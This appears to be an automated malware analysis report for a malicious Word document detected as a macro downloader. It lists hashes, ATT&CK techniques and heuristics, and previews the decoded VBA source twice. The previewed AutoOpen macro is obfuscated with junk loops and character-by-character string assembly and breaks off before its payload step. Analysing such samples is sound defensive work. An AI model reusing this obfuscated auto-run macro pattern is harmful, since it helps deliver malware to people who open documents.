Office (OLE) malware analysis — malicious · 94eef22ff6f73b93

MALICIOUS

Office (OLE)

254.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 32e5c2e8176902d4f5642d2f0130b057 SHA-1: 30c4ac6def85048dbb3914b8c6b05f1b36409756 SHA-256: 94eef22ff6f73b93b63e8374971a00668e4383c0b2899fd7df8c60d5c65f14ba

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV and contains a high-severity heuristic for VBA macros with an AutoOpen execution. The AutoOpen VBA macro is obfuscated but appears to contain logic for executing code, likely to download a secondary payload. The presence of legacy WordBasic auto-exec markers and GetObject calls further indicates malicious intent.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 77249 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	77249 bytes
SHA-256: `e5acf694462624a5b3dd6319927b1e7d2dbb7135f7f0c11f774f119a25797cec`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub BaMIleaYGlyVuceQoj() XuVAniVYfUjavg = InStr("dyvIJbIXUcy", "dyvIJbIXUcydyvIJbIXUcy") End Sub Sub AutoOpen() Dim PEhuXyQeHeZIFApiq Dim qYdoHyQoCuD qYdoHyQoCuD = Log(10) qYdoHyQoCuD = qYdoHyQoCuD + Log(12) For PEhuXyQeHeZIFApiq = 6 To 11 Dim GeiIZUTOSiqIN GeiIZUTOSiqIN = Rnd(101) If GeiIZUTOSiqIN > 26106 Then GeiIZUTOSiqIN = Exp(1) End If Dim xOzezEcAsOXYloNUMupo For xOzezEcAsOXYloNUMupo = 1 To 12 Dim nyoKuKESuJeDuFeNIj nyoKuKESuJeDuFeNIj = Fix(45634) Next Dim qeMYmYZAcILOgeGOVZBaWy Dim XotaKeCAvafiqO XotaKeCAvafiqO = Rnd(134) If XotaKeCAvafiqO > 43283 Then XotaKeCAvafiqO = Exp(4) End If Dim juuKagIWIKwcIHoQelyBU For juuKagIWIKwcIHoQelyBU = 10 To 11 Dim pEPaZAHydeqygiNuNYx pEPaZAHydeqygiNuNYx = Fix(72383) Next qeMYmYZAcILOgeGOVZBaWy = Fix(48907) Next Debug.Print "MoCUqoFytALy" QijYgOiaSidevokHiXEZm = Val("5447.8") & "VYkaiygyaepYz" On Error Resume Next JYwOrExaFaXePifOHohyRIKI = InStr("MuxoQECaRAZuxoDAkeQwOT", "MuxoQECaRAZuxoDAkeQwOTMuxoQECaRAZuxoDAkeQwOT") SXikYHeDIlYteRE = InStr("TohUWaLamaQUMkEkSUdU", "TohUWaLamaQUMkEkSUdUTohUWaLamaQUMkEkSUdU") Dim TILODehavLAPA DeBihUfxNIROroxar = Val("60034.10") & "LoHibeBWiJiWygUQ" Dim xeMavoGyVoKyLoHoJOHitat For xeMavoGyVoKyLoHoJOHitat = 9 To 10 Dim XONyWofaiERvOVemAqY XONyWofaiERvOVemAqY = Fix(39534) Next For TILODehavLAPA = 4 To 12 Dim vYpoPOpevipDupYh iwIlAqazUHAiYrOWoK = InStr("KEmiqonyNOPAseHEwITEgu", "KEmiqonyNOPAseHEwITEguKEmiqonyNOPAseHEwITEgu") deGUKakoWEhOGENAly = InStr("WuKYSneVEsyBAhaKe", "WuKYSneVEsyBAhaKeWuKYSneVEsyBAhaKe") vYpoPOpevipDupYh = Fix(77245) TiLeCIiosenYaAvO = InStr("hyPeqaZoBecOb", "hyPeqaZoBecObhyPeqaZoBecOb") Next FuJAiRaSluJOGI = Val("9689.10") & "lYCaFIRULOFet" rYiaravobILuLosa = Val("57368.10") & "CaqAaYFYjojEp" ZleVItiTeRakOlhaC = 54508 Dim LEfUNEGyxaiXuMOgFpYlo For LEfUNEGyxaiXuMOgFpYlo = 7 To 10 Dim zYgYDyTIZUPOSi zYgYDyTIZUPOSi = Fix(47691) cobaiArUpOqYVEvAh = 27783 Next Dim jeyLoDyweqaXo jeyLoDyweqaXo = Rnd(104) Dim ToCiNEDeLEaIzeTyc ToCiNEDeLEaIzeTyc = Rnd(106) If ToCiNEDeLEaIzeTyc > 47470 Then ToCiNEDeLEaIzeTyc = Exp(6) End If If jeyLoDyweqaXo > 13498 Then Dim HAZDARAaia HAZDARAaia = Rnd(121) If HAZDARAaia > 44470 Then HAZDARAaia = Exp(1) End If puTEbOtyFIXATiDOkVYHEX = InStr("JUdxaHAkanujya", "JUdxaHAkanujyaJUdxaHAkanujya") jeyLoDyweqaXo = Exp(4) Debug.Print "cWEjyREtuDOKY" RisiqAhakC = InStr("QubogIvuJOziTAeSEkyHuzI", "QubogIvuJOziTAeSEkyHuzIQubogIvuJOziTAeSEkyHuzI") End If Dim laxAKedufiNU laxAKedufiNU = Log(9) laxAKedufiNU = laxAKedufiNU + Log(10) doWuWaKYHohOFYqa = Val("20102.8") & "CaxeRoJYjOZEHA" Dim qIdITOZaNINUwUVUzeJa Debug.Print "VaNaOVIdIGyMOWyDycuj" qIdITOZaNINUwUVUzeJa = Log(4) FeBEfEvoCyCacOPISOmua = 91087 Debug.Print "xOzOrOPoPwiHaIGaQAgoL" Dim coaOziFyQuMypeJ coaOziFyQuMypeJ = Log(4) coaOziFyQuMypeJ = coaOziFyQuMypeJ + Log(12) qIdITOZaNINUwUVUzeJa = qIdITOZaNINUwUVUzeJa + Log(10) MoMiByfEDYgunAtUhaDEdoQY = "" Dim xNUhOsIWuRaoWEjin xNUhOsIWuRaoWEjin = Rnd(119) Dim pkEsyqAaUruKyVagEje pkEsyqAaUruKyVagEje = Log(3) pkEsyqAaUruKyVagEje = pkEsyqAaUruKyVagEje + Log(13) If xNUhOsIWuRaoWEjin > 87610 Then Debug.Print "RAFYqEvUzyiIsykaKyZI" Debug.Print "BIcDUCIReuJEpJyZiXiC" xNUhOsIWuRaoWEjin = Exp(9) dUeCArYXyt = Val("6893.1") & "puwYmucaDOKUdOlAqoMeBy" Debug.Print "rqOJIWUaePIzIv" End If Dim gOtiaCONW For gOtiaCONW = 9 To 12 Dim iHadaWOzEvONOWU iHadaWOzEvONOWU = Fix(84145) Next MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((304 + 608) = 912, "s", "DWb9m") upIdOpIqZayMEzakOBUm = Val("5185.1") & "nafeKAiuDabfUPi" aiGiAtOLiNYXEHySEkYBow = InStr("zUHuDYgafeWUxIXoWYiaaIgA", "zUHuDYgafeWUxIXoWYiaaIgAzUHuDYgafeWUxIXoWYiaaIgA") NGuwiLhormobUV = InStr ... (truncated)

SHA-256: e5acf694462624a5b3dd6319927b1e7d2dbb7135f7f0c11f774f119a25797cec

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub BaMIleaYGlyVuceQoj()
XuVAniVYfUjavg = InStr("dyvIJbIXUcy", "dyvIJbIXUcydyvIJbIXUcy")


End Sub
Sub AutoOpen()
Dim PEhuXyQeHeZIFApiq
Dim qYdoHyQoCuD
qYdoHyQoCuD = Log(10)

qYdoHyQoCuD = qYdoHyQoCuD + Log(12)
For PEhuXyQeHeZIFApiq = 6 To 11
Dim GeiIZUTOSiqIN
GeiIZUTOSiqIN = Rnd(101)
If GeiIZUTOSiqIN > 26106 Then
   GeiIZUTOSiqIN = Exp(1)
End If
Dim xOzezEcAsOXYloNUMupo
For xOzezEcAsOXYloNUMupo = 1 To 12
   Dim nyoKuKESuJeDuFeNIj
   nyoKuKESuJeDuFeNIj = Fix(45634)
Next
   Dim qeMYmYZAcILOgeGOVZBaWy
Dim XotaKeCAvafiqO
XotaKeCAvafiqO = Rnd(134)
If XotaKeCAvafiqO > 43283 Then
   XotaKeCAvafiqO = Exp(4)
End If
Dim juuKagIWIKwcIHoQelyBU
For juuKagIWIKwcIHoQelyBU = 10 To 11
   Dim pEPaZAHydeqygiNuNYx
   pEPaZAHydeqygiNuNYx = Fix(72383)
Next
   qeMYmYZAcILOgeGOVZBaWy = Fix(48907)
Next
Debug.Print "MoCUqoFytALy"
QijYgOiaSidevokHiXEZm = Val("5447.8") & "VYkaiygyaepYz"
On Error Resume Next
JYwOrExaFaXePifOHohyRIKI = InStr("MuxoQECaRAZuxoDAkeQwOT", "MuxoQECaRAZuxoDAkeQwOTMuxoQECaRAZuxoDAkeQwOT")
SXikYHeDIlYteRE = InStr("TohUWaLamaQUMkEkSUdU", "TohUWaLamaQUMkEkSUdUTohUWaLamaQUMkEkSUdU")
Dim TILODehavLAPA
DeBihUfxNIROroxar = Val("60034.10") & "LoHibeBWiJiWygUQ"
Dim xeMavoGyVoKyLoHoJOHitat
For xeMavoGyVoKyLoHoJOHitat = 9 To 10
   Dim XONyWofaiERvOVemAqY
   XONyWofaiERvOVemAqY = Fix(39534)
Next
For TILODehavLAPA = 4 To 12
   Dim vYpoPOpevipDupYh
iwIlAqazUHAiYrOWoK = InStr("KEmiqonyNOPAseHEwITEgu", "KEmiqonyNOPAseHEwITEguKEmiqonyNOPAseHEwITEgu")
deGUKakoWEhOGENAly = InStr("WuKYSneVEsyBAhaKe", "WuKYSneVEsyBAhaKeWuKYSneVEsyBAhaKe")
   vYpoPOpevipDupYh = Fix(77245)
TiLeCIiosenYaAvO = InStr("hyPeqaZoBecOb", "hyPeqaZoBecObhyPeqaZoBecOb")
Next
FuJAiRaSluJOGI = Val("9689.10") & "lYCaFIRULOFet"

rYiaravobILuLosa = Val("57368.10") & "CaqAaYFYjojEp"
ZleVItiTeRakOlhaC = 54508
Dim LEfUNEGyxaiXuMOgFpYlo
For LEfUNEGyxaiXuMOgFpYlo = 7 To 10
   Dim zYgYDyTIZUPOSi
   zYgYDyTIZUPOSi = Fix(47691)
cobaiArUpOqYVEvAh = 27783
Next

Dim jeyLoDyweqaXo
jeyLoDyweqaXo = Rnd(104)
Dim ToCiNEDeLEaIzeTyc
ToCiNEDeLEaIzeTyc = Rnd(106)
If ToCiNEDeLEaIzeTyc > 47470 Then
   ToCiNEDeLEaIzeTyc = Exp(6)
End If
If jeyLoDyweqaXo > 13498 Then
Dim HAZDARAaia
HAZDARAaia = Rnd(121)
If HAZDARAaia > 44470 Then
   HAZDARAaia = Exp(1)
End If
puTEbOtyFIXATiDOkVYHEX = InStr("JUdxaHAkanujya", "JUdxaHAkanujyaJUdxaHAkanujya")
   jeyLoDyweqaXo = Exp(4)
Debug.Print "cWEjyREtuDOKY"
RisiqAhakC = InStr("QubogIvuJOziTAeSEkyHuzI", "QubogIvuJOziTAeSEkyHuzIQubogIvuJOziTAeSEkyHuzI")
End If
Dim laxAKedufiNU
laxAKedufiNU = Log(9)

laxAKedufiNU = laxAKedufiNU + Log(10)
doWuWaKYHohOFYqa = Val("20102.8") & "CaxeRoJYjOZEHA"
Dim qIdITOZaNINUwUVUzeJa
Debug.Print "VaNaOVIdIGyMOWyDycuj"
qIdITOZaNINUwUVUzeJa = Log(4)
FeBEfEvoCyCacOPISOmua = 91087
Debug.Print "xOzOrOPoPwiHaIGaQAgoL"

Dim coaOziFyQuMypeJ
coaOziFyQuMypeJ = Log(4)

coaOziFyQuMypeJ = coaOziFyQuMypeJ + Log(12)
qIdITOZaNINUwUVUzeJa = qIdITOZaNINUwUVUzeJa + Log(10)
MoMiByfEDYgunAtUhaDEdoQY = ""
Dim xNUhOsIWuRaoWEjin
xNUhOsIWuRaoWEjin = Rnd(119)
Dim pkEsyqAaUruKyVagEje
pkEsyqAaUruKyVagEje = Log(3)

pkEsyqAaUruKyVagEje = pkEsyqAaUruKyVagEje + Log(13)
If xNUhOsIWuRaoWEjin > 87610 Then
Debug.Print "RAFYqEvUzyiIsykaKyZI"
Debug.Print "BIcDUCIReuJEpJyZiXiC"
   xNUhOsIWuRaoWEjin = Exp(9)
dUeCArYXyt = Val("6893.1") & "puwYmucaDOKUdOlAqoMeBy"
Debug.Print "rqOJIWUaePIzIv"
End If
Dim gOtiaCONW
For gOtiaCONW = 9 To 12
   Dim iHadaWOzEvONOWU
   iHadaWOzEvONOWU = Fix(84145)
Next


 MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((304 + 608) = 912, "s", "DWb9m")
upIdOpIqZayMEzakOBUm = Val("5185.1") & "nafeKAiuDabfUPi"
aiGiAtOLiNYXEHySEkYBow = InStr("zUHuDYgafeWUxIXoWYiaaIgA", "zUHuDYgafeWUxIXoWYiaaIgAzUHuDYgafeWUxIXoWYiaaIgA")
NGuwiLhormobUV = InStr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.